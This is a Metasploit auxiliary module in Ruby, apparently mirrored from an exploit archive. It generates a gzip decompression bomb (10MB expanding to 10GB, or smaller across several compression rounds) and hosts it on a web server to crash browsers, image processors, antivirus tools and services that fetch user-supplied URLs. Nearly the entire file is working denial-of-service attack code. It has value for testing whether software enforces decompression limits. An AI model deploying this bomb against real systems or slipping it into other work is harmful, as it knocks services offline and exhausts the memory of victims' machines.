## https://sploitus.com/exploit?id=PACKETSTORM:180515
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
require 'stringio'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Gzip Memory Bomb Denial Of Service',
'Description' => %q{
This module generates and hosts a 10MB single-round gzip file that decompresses to 10GB.
Many applications will not implement a length limit check and will eat up all memory and
eventually die. This can also be used to kill systems that download/parse content from
a user-provided URL (image-processing servers, AV, websites that accept zipped POST data, etc).
A FILEPATH datastore option can also be provided to save the .gz bomb locally.
Some clients (Firefox) will allow for multiple rounds of gzip. Most gzip utils will correctly
deflate multiple rounds of gzip on a file. Setting ROUNDS=3 and SIZE=10240 (default value)
will generate a 300 byte gzipped file that expands to 10GB.
},
'Author' =>
[
'info[at]aerasec.de', # 2004 gzip bomb advisory
'joev' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.aerasec.de/security/advisories/decompression-bomb-vulnerability.html' ]
],
'DisclosureDate' => '2004-01-01',
'Actions' =>
[
[ 'WebServer', 'Description' => 'Host file via web server' ]
],
'PassiveActions' =>
[
'WebServer'
],
'DefaultAction' => 'WebServer'))
register_options(
[
OptInt.new('SIZE', [true, 'Size of uncompressed data in megabytes (10GB default).', 10240]),
OptInt.new('ROUNDS', [true, 'Rounds of gzip compression. Some applications (FF) support > 1.', 1]),
OptString.new('URIPATH', [false, 'Path of URI on server to the gzip bomb (default is random)']),
OptString.new('CONTENT_TYPE', [false, 'Content-Type header to serve in the response', 'text/html'])
],
self.class)
end
def run
datastore['HTTP::compression'] = false # not a good idea
@gzip = generate_gzip
print_status "Gzip generated. Uncompressed=#{default_size}bytes. Compressed=#{@gzip.length}bytes."
exploit # start http server
end
def on_request_uri(cli, request)
print_status "Sending gzipped payload to client #{cli.peerhost}"
rounds = (['gzip']*datastore['ROUNDS']).join(', ')
send_response(cli, @gzip, { 'Content-Encoding' => rounds, 'Content-Type' => datastore['CONTENT_TYPE'] })
end
# zlib ftw
def generate_gzip(size=default_size, blocks=nil, reps=nil)
reps ||= datastore['ROUNDS']
return blocks if reps < 1
print_status "Generating gzip bomb..."
StringIO.open do |io|
stream = Zlib::GzipWriter.new(io, Zlib::BEST_COMPRESSION, Zlib::DEFAULT_STRATEGY)
buf = nil
begin
# add MB of data to the stream. this takes a little while, but doesn't kill memory.
if blocks.nil?
chunklen = 1024*1024*8 # 8mb per chunk
a = "A"*chunklen
n = size / chunklen
n.times do |i|
stream << a
if i % 100 == 0
print_status "#{i.to_s.rjust(Math.log(n,10).ceil)}/#{n} chunks added (#{'%.1f' % (i.to_f/n.to_f*100)}%)"
end
end
else
stream << blocks
end
a = nil # gc a
buf = generate_gzip(size, io.string, reps-1)
ensure
stream.flush
stream.close
end
buf
end
end
def default_size
datastore['SIZE']*1024*1024 # mb -> bytes
end
end